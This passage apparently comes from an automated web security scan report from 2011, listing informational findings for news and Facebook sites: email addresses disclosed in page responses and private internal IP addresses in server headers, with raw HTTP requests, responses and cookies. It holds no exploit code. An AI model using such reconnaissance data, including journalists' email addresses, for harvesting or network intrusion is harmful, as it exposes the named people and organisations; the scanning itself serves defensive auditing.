...[SNIP]...
<mjijackson@gmail.com>
...[SNIP]...
19.11. http://www.clashmusic.com/sites/all/modules/shadowbox/shadowbox/src/skin/classic/skin.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.clashmusic.com
Path:   /sites/all/modules/shadowbox/shadowbox/src/skin/classic/skin.js

Issue detail

The following email address was disclosed in the response:

Request

GET /sites/all/modules/shadowbox/shadowbox/src/skin/classic/skin.js HTTP/1.1
Host: www.clashmusic.com
Proxy-Connection: keep-alive
Referer: http://www.clashmusic.com/news/sufjan-stevens-suffered-nervous-breakdown
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESS5079a7bd09304b581fb1d164353615c5=h78ot6e3amth8f4pu158nlhcb2

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 14:00:38 GMT
Server: Apache/2.0.52 (Red Hat)
Last-Modified: Mon, 12 Jan 2009 15:30:18 GMT
ETag: "7002df-da7-c8b51680"
Accept-Ranges: bytes
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=1209600
Expires: Mon, 23 May 2011 14:00:38 GMT
Connection: close
Content-Type: application/x-javascript
Content-Length: 3495

/**
* The "classic" theme markup for Shadowbox.
*
* This file is part of Shadowbox.
*
* Shadowbox is an online media viewer application that supports all of the
* web's most popular media publis
...[SNIP]...
<mjijackson@gmail.com>
...[SNIP]...
19.12. http://www.floridatoday.com/article/20110508/NEWS01/105080319/Highly-publicized-murder-Caylee-Anthony-rivets-enrages  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.floridatoday.com
Path:   /article/20110508/NEWS01/105080319/Highly-publicized-murder-Caylee-Anthony-rivets-enrages

Issue detail

The following email address was disclosed in the response:

Request

GET /article/20110508/NEWS01/105080319/Highly-publicized-murder-Caylee-Anthony-rivets-enrages HTTP/1.1
Host: www.floridatoday.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
P3P: CP="CAO CUR ADM DEVa TAIi PSAa PSDa CONi OUR OTRi IND PHY ONL UNI COM NAV DEM"
Last-Modified: Mon, 09 May 2011 13:55:06 GMT
X-Processing-begin: MOC-WN0483, on site A9 (2011-05-09 09:55:06:002)
Content-Type: text/html
X-Processing-finished: MOC-WN0483, on site A9 (2011-05-09 09:55:06:111)
Content-Type: text/html; charset=iso-8859-1
Vary: Accept-Encoding
Date: Mon, 09 May 2011 13:59:28 GMT
Connection: close
Content-Length: 119897

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns:meebo="http://www.meebo.com" lang="en">


<head>
       <title>Highly publicized murd
...[SNIP]...
<a href="mailto:jtorres@floridatoday.com">jtorres@floridatoday.com</a>
...[SNIP]...
19.13. http://www.floridatoday.com/odygel/lib/legacy/GDN/GDNpreload.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.floridatoday.com
Path:   /odygel/lib/legacy/GDN/GDNpreload.js

Issue detail

The following email address was disclosed in the response:

Request

GET /odygel/lib/legacy/GDN/GDNpreload.js HTTP/1.1
Host: www.floridatoday.com
Proxy-Connection: keep-alive
Referer: http://www.floridatoday.com/article/20110508/NEWS01/105080319/Highly-publicized-murder-Caylee-Anthony-rivets-enrages
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Last-Modified: Fri, 29 Apr 2011 16:50:42 GMT
Accept-Ranges: bytes
ETag: "01d66938d6cc1:0"
Server: Microsoft-IIS/6.0
P3P: CP="CAO CUR ADM DEVa TAIi PSAa PSDa CONi OUR OTRi IND PHY ONL UNI COM NAV DEM"
Vary: Accept-Encoding
Date: Mon, 09 May 2011 13:59:40 GMT
Connection: close
Content-Length: 64756

// define global settings
var gdn_AuthService = "GDNAuth.ashx",
gdn_ExtrovertService = "Extrovert/GDNExtrovert.ashx",
gdn_MaxSessions = 10,
gdn_RegService = "GCION.ashx",
gdn_Vers
...[SNIP]...
nable to register you. Please try again later.",
CompanySizeNone: "You must select your company size",
CountryNone: "You must select your country",
EmailInvalid: "Your email address is invalid (Ex. username@domain.com)",
EmailMax: "Your email address must be 100 characters or less",
EmailNone: "You must enter your email address",
ErrorHeader: "The following errors occurred in each required field:",
FirstNameMax
...[SNIP]...
19.14. http://www.floridatoday.com/odygel/lib/userauth/validateform.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.floridatoday.com
Path:   /odygel/lib/userauth/validateform.js

Issue detail

The following email address was disclosed in the response:

Request

GET /odygel/lib/userauth/validateform.js HTTP/1.1
Host: www.floridatoday.com
Proxy-Connection: keep-alive
Referer: http://www.floridatoday.com/article/20110508/NEWS01/105080319/Highly-publicized-murder-Caylee-Anthony-rivets-enrages
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: rsi_segs=D08734_70008|D08734_72078; GCIONSN=AAAAOn52dzoxfnVidDox; GCIONPN=AAAAOn5zZWdtZW50czpEMDg3MzRfNzAwMDh8RDA4NzM0XzcyMDc4

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Last-Modified: Mon, 11 Oct 2010 19:11:08 GMT
Accept-Ranges: bytes
ETag: "0ae11f7869cb1:0"
Server: Microsoft-IIS/6.0
P3P: CP="CAO CUR ADM DEVa TAIi PSAa PSDa CONi OUR OTRi IND PHY ONL UNI COM NAV DEM"
Vary: Accept-Encoding
Date: Mon, 09 May 2011 13:59:44 GMT
Connection: close
Content-Length: 7140

if (typeof GEL == 'undefined' || !GEL ) GEL= { util: new Object() };
//GEL.namespace("widget");
//derived from Paid content ValidateRegistration script
(function(){
GEL.widget.ValidateRegistrati
...[SNIP]...
s must be 100 characters or less");
           errordiv.push(emailObj);
       }
       else if (!GDN.Validate.IsEmail(emailObj.value))
       {
           valid = false;
           errorArray.push("Your email address is invalid (Ex. username@domain.com");
           errordiv.push(emailObj);
       }
       
       
                       if (firstBadObj==null && valid==false) {
           firstBadObj = emailObj;
       }

       gendermaleObj = get_object("ody_ac_gendermale");
       genderf
...[SNIP]...
s must be 100 characters or less");
           errordiv.push(emailObj);
       }
       else if (!GDN.Validate.IsEmail(emailObj.value))
       {
           valid = false;
           errorArray.push("Your email address is invalid (Ex. username@domain.com");
           errordiv.push(emailObj);
       }
       
   
       if (firstBadObj==null && valid==false) {
           firstBadObj = emailObj;
       }
       passwordObj = get_object("ody_la_password");
       
       if (GDN.IsNullOrEmpty(pa
...[SNIP]...
19.15. http://www.indianasnewscenter.com/includes/granite_js_lib.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.indianasnewscenter.com
Path:   /includes/granite_js_lib.js

Issue detail

The following email address was disclosed in the response:

Request

GET /includes/granite_js_lib.js HTTP/1.1
Host: www.indianasnewscenter.com
Proxy-Connection: keep-alive
Referer: http://www.indianasnewscenter.com/news/local/At-Noon-Casey-Anthony-Trial-Begins-In-Florida-Plus-More-121488004.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: click_mobile=0; __qseg=Q_D|Q_T

Response

HTTP/1.1 200 OK
Server: Apache
Last-Modified: Sun, 08 May 2011 06:52:55 GMT
Vary: Accept-Encoding
X-Server-Name: sj-c14-r1-u7
Content-Type: text/javascript;charset=utf-8
Date: Mon, 09 May 2011 13:59:05 GMT
Connection: close
Set-Cookie: click_mobile=0
Content-Length: 54380

/**
* hoverIntent r5 // 2007.03.27 // jQuery 1.1.2+
* <http://cherne.net/brian/resources/jquery.hoverIntent.html>
*
* @param f onMouseOver function || An object with configuration options
* @p
...[SNIP]...
<brian@cherne.net>
...[SNIP]...
19.16. http://www.irishtimes.com/js/s_code.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.irishtimes.com
Path:   /js/s_code.js

Issue detail

The following email address was disclosed in the response:

Request

GET /js/s_code.js HTTP/1.1
Host: www.irishtimes.com
Proxy-Connection: keep-alive
Referer: http://www.irishtimes.com/newspaper/theticket/2011/0506/1224296203710.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Age: 29635
Date: Mon, 09 May 2011 05:47:02 GMT
Expires: Mon, 09 May 2011 17:47:02 GMT
Cache-Control: max-age = 43200
Connection: Keep-Alive
Via: NS-CACHE-6.0: 101
ETag: "6fd4399-5181-4d41a84e"
Server: Apache
Last-Modified: Thu, 27 Jan 2011 17:15:58 GMT
Accept-Ranges: bytes
Content-Length: 20865
Keep-Alive: timeout=300, max=1995
Content-Type: application/x-javascript

/* SiteCatalyst code version: H.15.1.
Copyright 1997-2008 Omniture, Inc. More info available at
http://www.omniture.com */
var s_account="itgirishtimesprod"
var s=s_gi(s_account)
/********************
...[SNIP]...
)`i+s.hav()+q+(qs?qs:s.rq(^C)),0,id,ta);qs`h;`Wm('t')`5s.p"
+"_r)s.p_r()}^7(qs);^y`o(@g;`k@g`L^9,`F$51',vb`R@G=^D=s.`N`g=s.`N^K=`E^z^x=s.ppu=^n=^nv1=^nv2=^nv3`h`5$t)`E^z@G=`E^zeo=`E^z`N`g=`E^z`N^K`h`5!id@Us.tc){s.tc=1;s.flush`Z()}`2$h`Atl`0o,t,n,vo`1;s.@G=@uo"
+"`R`N^K=t;s.`N`g=n;s.t(@g}`5pg){`E^zco`0o){`K@J\"_\",1,#8`2@uo)`Awd^zgs`0$P{`K@J$k1,#8`2s.t()`Awd^zdc`0$P{`K@J$k#8`2s.t()}}@2=(`E`I`X`8`4@ss@b0`Rd=^
...[SNIP]...
19.17. http://www.irishtimes.com/newspaper/theticket/2011/0506/1224296203710.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.irishtimes.com
Path:   /newspaper/theticket/2011/0506/1224296203710.html

Issue detail

The following email addresses were disclosed in the response:

Request

GET /newspaper/theticket/2011/0506/1224296203710.html HTTP/1.1
Host: www.irishtimes.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Age: 100
Date: Mon, 09 May 2011 13:59:03 GMT
Expires: Mon, 09 May 2011 14:04:03 GMT
Cache-Control: max-age = 300
Connection: Keep-Alive
Via: NS-CACHE-6.0: 101
ETag: "12c78d-f63a-4dc7eff3"
Server: Apache
Last-Modified: Mon, 09 May 2011 13:45:23 GMT
Accept-Ranges: bytes
Keep-Alive: timeout=300, max=1994
Content-Type: text/html; charset=US-ASCII
Cache-Control: private
Content-Length: 63034

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html><head><meta http-equiv="Content-Type" content="text/html; charset=US-ASC
...[SNIP]...
<option value="tclaytonlea@irishtimes.com">Rock/Pop</option><option value="jimcarroll@irishtimes.com">Clubs</option><option value="tclaytonlea@irishtimes.com">Roots</option><option value="slong@irishtimes.com">
...[SNIP]...
<option value="rcomiskey@irishtimes.com">Jazz</option><option value="mdervan@irishtimes.com">
...[SNIP]...
<option value="pcrawley@irishtimes.com">Theatre</option><option value="adunne@irishtimes.com">Art</option><option value="sthompson@irishtimes.com">Children</option><option value="bboyd@irishtimes.com">Comedy</option><option value="smacreamoinn@irishtimes.com">Dance</option><option value="cdillon@irishtimes.com">
...[SNIP]...
<input type="hidden" name="bylineemail" value="features@irishtimes.com">
...[SNIP]...
19.18. http://www.thevine.com.au/music/blogs/music-dump-_-sufjan-stevens-selling-beastie-boys-headphones-to-johnny-cash20110508.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.thevine.com.au
Path:   /music/blogs/music-dump-_-sufjan-stevens-selling-beastie-boys-headphones-to-johnny-cash20110508.aspx

Issue detail

The following email address was disclosed in the response:

Request

GET /music/blogs/music-dump-_-sufjan-stevens-selling-beastie-boys-headphones-to-johnny-cash20110508.aspx HTTP/1.1
Host: www.thevine.com.au
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 14:00:53 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=kxuwnfahnyntrb45nyzhom55; path=/; HttpOnly
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 269864


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" >
<head id="ctl00_Head1"><t
...[SNIP]...
<a id="ctl00_holderBody_ctl00_ContentScoopControl_lnkScoop" href="mailto:citizens@thevine.com.au">citizens@thevine.com.au</a>
...[SNIP]...
20. Private IP addresses disclosed  previous  next
There are 48 instances of this issue:

Issue background

RFC 1918 specifies ranges of IP addresses that are reserved for use in private networks and cannot be routed on the public Internet. Although various methods exist by which an attacker can determine the public IP addresses in use by an organisation, the private addresses used internally cannot usually be determined in the same ways.

Discovering the private addresses used within an organisation can help an attacker in carrying out network-layer attacks aiming to penetrate the organisation's internal infrastructure.

Issue remediation

There is not usually any good reason to disclose the internal IP addresses used within an organisation's infrastructure. If these are being returned in service banners or debug messages, then the relevant services should be configured to mask the private addresses. If they are being used to track back-end servers for load balancing purposes, then the addresses should be rewritten with innocuous identifiers from which an attacker cannot infer any useful information about the infrastructure.

20.1. http://api.facebook.com/restserver.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://api.facebook.com
Path:   /restserver.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /restserver.php?v=1.0&method=links.getStats&urls=%5B%22http%3A%2F%2Fwww.indianasnewscenter.com%2Fnews%2Flocal%2FAt-Noon-Casey-Anthony-Trial-Begins-In-Florida-Plus-More-121488004.html%22%5D&format=json&callback=fb_sharepro_render HTTP/1.1
Host: api.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.indianasnewscenter.com/news/local/At-Noon-Casey-Anthony-Trial-Begins-In-Florida-Plus-More-121488004.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; datr=ituyTcnawc6q7VcE0gibPCo2

Response

HTTP/1.1 200 OK
Cache-Control: public, max-age=120
Content-Type: text/javascript;charset=utf-8
Expires: Mon, 09 May 2011 07:01:10 -0700
Pragma:
X-FB-Rev: 375286
X-FB-Server: 10.32.29.120
X-Cnection: close
Date: Mon, 09 May 2011 13:59:10 GMT
Content-Length: 430

fb_sharepro_render([{"url":"http:\/\/www.indianasnewscenter.com\/news\/local\/At-Noon-Casey-Anthony-Trial-Begins-In-Florida-Plus-More-121488004.html","normalized_url":"http:\/\/www.indianasnewscenter.
...[SNIP]...
20.2. http://connect.facebook.net/en_GB/all.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://connect.facebook.net
Path:   /en_GB/all.js

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /en_GB/all.js HTTP/1.1
Host: connect.facebook.net
Proxy-Connection: keep-alive
Referer: http://www.nme.com/news/sufjan-stevens/56527
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript; charset=utf-8
ETag: "335def1c7b2d67524dcb7a3631c54187"
X-FB-Server: 10.27.126.104
X-Cnection: close
Cache-Control: public, max-age=834
Expires: Mon, 09 May 2011 14:15:08 GMT
Date: Mon, 09 May 2011 14:01:14 GMT
Connection: close
Vary: Accept-Encoding
Content-Length: 117950

/*1304912404,169573992,JIT Construction: v375286,en_GB*/

if(!window.FB)window.FB={_apiKey:null,_session:null,_userStatus:'unknown',_logging:true,_inCanvas:((window.location.search.indexOf('fb_sig_in_
...[SNIP]...
20.3. http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php/en_US  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://static.ak.connect.facebook.com
Path:   /js/api_lib/v0.4/FeatureLoader.js.php/en_US

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /js/api_lib/v0.4/FeatureLoader.js.php/en_US HTTP/1.1
Host: static.ak.connect.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.orlandosentinel.com/business/os-cfb-cover-casey-tv-20110509,0,6839926.story
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; datr=ituyTcnawc6q7VcE0gibPCo2

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript; charset=utf-8
ETag: "04b44d52c20529054ca11e5e32607c9c"
X-FB-Server: 10.32.135.129
X-Cnection: close
Vary: Accept-Encoding
Cache-Control: public, max-age=419
Expires: Mon, 09 May 2011 14:06:29 GMT
Date: Mon, 09 May 2011 13:59:30 GMT
Connection: close
Content-Length: 18453

/*1304703338,169904001,JIT Construction: v374976,en_US*/

if (!window.FB) {FB = {};} if(!FB.dynData) { FB.dynData = {"site_vars":{"canvas_client_compute_content_size_method":1,"use_postMessage":0,"use
...[SNIP]...
20.4. http://static.ak.fbcdn.net/connect/xd_proxy.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://static.ak.fbcdn.net
Path:   /connect/xd_proxy.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /connect/xd_proxy.php?version=0 HTTP/1.1
Host: static.ak.fbcdn.net
Proxy-Connection: keep-alive
Referer: http://www.indianasnewscenter.com/news/local/At-Noon-Casey-Anthony-Trial-Begins-In-Florida-Plus-More-121488004.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.138.17.182
Vary: Accept-Encoding
Cache-Control: public, max-age=1505
Expires: Mon, 09 May 2011 14:24:14 GMT
Date: Mon, 09 May 2011 13:59:09 GMT
Connection: close
Content-Length: 3017

<!doctype html>
<html>
<head>
<title>XD Proxy</title>
</head>
<body onload="doFragmentSend()">
<div
id="swf_holder"
style="position: absolute; top: -10000px; width: 1px; heig
...[SNIP]...
20.5. http://static.ak.fbcdn.net/rsrc.php/v1/y3/r/uBEmPS-MH2t.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://static.ak.fbcdn.net
Path:   /rsrc.php/v1/y3/r/uBEmPS-MH2t.js

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /rsrc.php/v1/y3/r/uBEmPS-MH2t.js HTTP/1.1
Host: static.ak.fbcdn.net
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/plugins/likebox.php?api_key=158577044196953&channel=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df251994bac%26origin%3Dhttp%253A%252F%252Fwww.nme.com%252Ff272cfc8b4%26relation%3Dparent.parent%26transport%3Dpostmessage&colorscheme=light&header=false&height=258&href=http%3A%2F%2Fwww.facebook.com%2Fnmemagazine&locale=en_GB&sdk=joey&show_faces=true&stream=false&width=356
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript; charset=utf-8
Last-Modified: Mon, 02 May 2011 02:06:11 GMT
X-FB-Server: 10.30.145.198
X-Cnection: close
Vary: Accept-Encoding
Cache-Control: public, max-age=30889345
Expires: Tue, 01 May 2012 02:23:44 GMT
Date: Mon, 09 May 2011 14:01:19 GMT
Connection: close
Content-Length: 103915

/*1304303048,169775558*/

if (window.CavalryLogger) { CavalryLogger.start_js(["Zz9gy"]); }

function object(b){var a=new Function();a.prototype=b;return new a();}function is_scalar(a){return (/string|
...[SNIP]...
20.6. http://static.ak.fbcdn.net/rsrc.php/v1/yT/r/Q0crEbz3ZUz.png  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://static.ak.fbcdn.net
Path:   /rsrc.php/v1/yT/r/Q0crEbz3ZUz.png

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /rsrc.php/v1/yT/r/Q0crEbz3ZUz.png HTTP/1.1
Host: static.ak.fbcdn.net
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/plugins/comments.php?api_key=c87f9494a93b2590633af39d1b8e347f&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df2fb777bd4%26origin%3Dhttp%253A%252F%252Fwww.indianasnewscenter.com%252Ff208516ccc%26relation%3Dparent.parent%26transport%3Dpostmessage&href=www.indianasnewscenter.com%2Fnews%2Flocal%2FAt-Noon-Casey-Anthony-Trial-Begins-In-Florida-Plus-More-121488004.html&locale=en_US&numposts=25&sdk=joey&width=630
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Length: 814
Content-Type: image/png
Last-Modified: Tue, 29 Mar 2011 05:23:09 GMT
X-FB-Server: 10.30.148.190
X-Cnection: close
Cache-Control: public, max-age=28605055
Expires: Wed, 04 Apr 2012 15:50:13 GMT
Date: Mon, 09 May 2011 13:59:18 GMT
Connection: close

.PNG
.
...IHDR................a...    pHYs...H...H.F.k>...    vpAg.........\.......bKGD.............WIDAT8O..;kTa.E.......3..tTL..._    .T.. .k..B..:.....vv".V."*
....P.....<2..7.{Z....W.O.`.....s....3......
...[SNIP]...
20.7. http://static.ak.fbcdn.net/rsrc.php/v1/yY/r/qWIGt6WPRA1.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://static.ak.fbcdn.net
Path:   /rsrc.php/v1/yY/r/qWIGt6WPRA1.js

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /rsrc.php/v1/yY/r/qWIGt6WPRA1.js HTTP/1.1
Host: static.ak.fbcdn.net
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/plugins/comments.php?api_key=158577044196953&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df6000e528%26origin%3Dhttp%253A%252F%252Fwww.nme.com%252Ff272cfc8b4%26relation%3Dparent.parent%26transport%3Dpostmessage&href=http%3A%2F%2Fwww.nme.com%2Fnews%2Fsufjan-stevens%2F56527&locale=en_GB&numposts=10&sdk=joey&width=620
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript; charset=utf-8
Last-Modified: Mon, 02 May 2011 23:39:20 GMT
X-FB-Server: 10.138.69.184
Vary: Accept-Encoding
Cache-Control: public, max-age=31020576
Expires: Wed, 02 May 2012 14:50:55 GMT
Date: Mon, 09 May 2011 14:01:19 GMT
Connection: close
Content-Length: 25519

/*1304434325,176833976*/

if (window.CavalryLogger) { CavalryLogger.start_js(["GBzRm"]); }

if(!window.CommentAdminPanelController){window.CommentAdminPanelController=function(a){copy_properties(this,
...[SNIP]...
20.8. http://static.ak.fbcdn.net/rsrc.php/v1/yd/r/dMZead4v66-.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://static.ak.fbcdn.net
Path:   /rsrc.php/v1/yd/r/dMZead4v66-.js

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /rsrc.php/v1/yd/r/dMZead4v66-.js HTTP/1.1
Host: static.ak.fbcdn.net
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/plugins/comments.php?api_key=158577044196953&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df6000e528%26origin%3Dhttp%253A%252F%252Fwww.nme.com%252Ff272cfc8b4%26relation%3Dparent.parent%26transport%3Dpostmessage&href=http%3A%2F%2Fwww.nme.com%2Fnews%2Fsufjan-stevens%2F56527&locale=en_GB&numposts=10&sdk=joey&width=620
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript; charset=utf-8
Last-Modified: Tue, 03 May 2011 18:58:29 GMT
X-FB-Server: 10.138.64.185
Vary: Accept-Encoding
Cache-Control: public, max-age=31036912
Expires: Wed, 02 May 2012 19:23:11 GMT
Date: Mon, 09 May 2011 14:01:19 GMT
Connection: close
Content-Length: 135251

/*1304450636,176832697*/

if (window.CavalryLogger) { CavalryLogger.start_js(["5bAwC"]); }

function Poller(b,a){this.setTimePeriod(b);this._requestCallback=a;this.scheduleRequest();}Poller.MIN_TIME_P
...[SNIP]...
20.9. http://static.ak.fbcdn.net/rsrc.php/v1/yj/r/RxZwFAf4oY9.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://static.ak.fbcdn.net
